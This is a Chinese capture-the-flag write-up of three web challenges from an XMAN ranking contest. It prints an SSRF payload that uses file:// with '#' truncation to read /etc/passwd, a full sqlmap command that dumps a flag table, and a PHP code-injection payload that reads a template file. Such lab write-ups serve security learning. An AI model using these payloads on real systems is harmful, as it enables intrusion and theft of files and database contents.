XMAN -个人排位赛 WEB-WRITEup

XMAN -个人排位赛 WEB-WRITEup

Simple SSRF

+ 备注:curl + #  截断
  • 首先在输入框输入发现只能输入www.baidu.com这个域名并测试出用井号(%23)可以进行截断

  • 于是测试用file:// 尝试读取本地文件

  •   http://202.112.51.184:11080/?submit=%CC%E1%BD%BB%B2%E9%D1%AF&site=file://www.baidu.com/etc/passwd%23
    

    发现可以读取成功


    ssrf1.png

    (容我真的没有想到flag会在etc/flag.txt)

      view-source:http://202.112.51.184:11080/?submit=%CC%E1%BD%BB%B2%E9%D1%AF&site=file://www.baidu.com/etc/flag.txt%23
    
    ssrf2.png

bbsqli

直接放到sqlmap中跑出结果

c:/python27/python.exe  sqlmap.py -u "http://202.112.51.184:16080" --cookie "PHPSESSID=56a230bad525bab2c441cb1f64d7106e" --level 2 -D sqli -T [GDJM_flag]  -C flag --dump
bbsqli.png
flag:xman{YoVr_4R3_a_Bada5s_Ge7_My_Fl4g}

makeit

  • 首先看到 http://202.112.51.184:15080/?page=about 中有I used Git

    makeit1.png

    于是直接Githack index.php

    makeit2.png

    构造 page=1') or print_r(file_get_contents('templates/flag.php'));//

    view-source:http://202.112.51.184:15080/?page=1') or print_r(file_get_contents('templates/flag.php'));//
    

    makeit3.png

    XMAN{flag_is_so_cool}

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。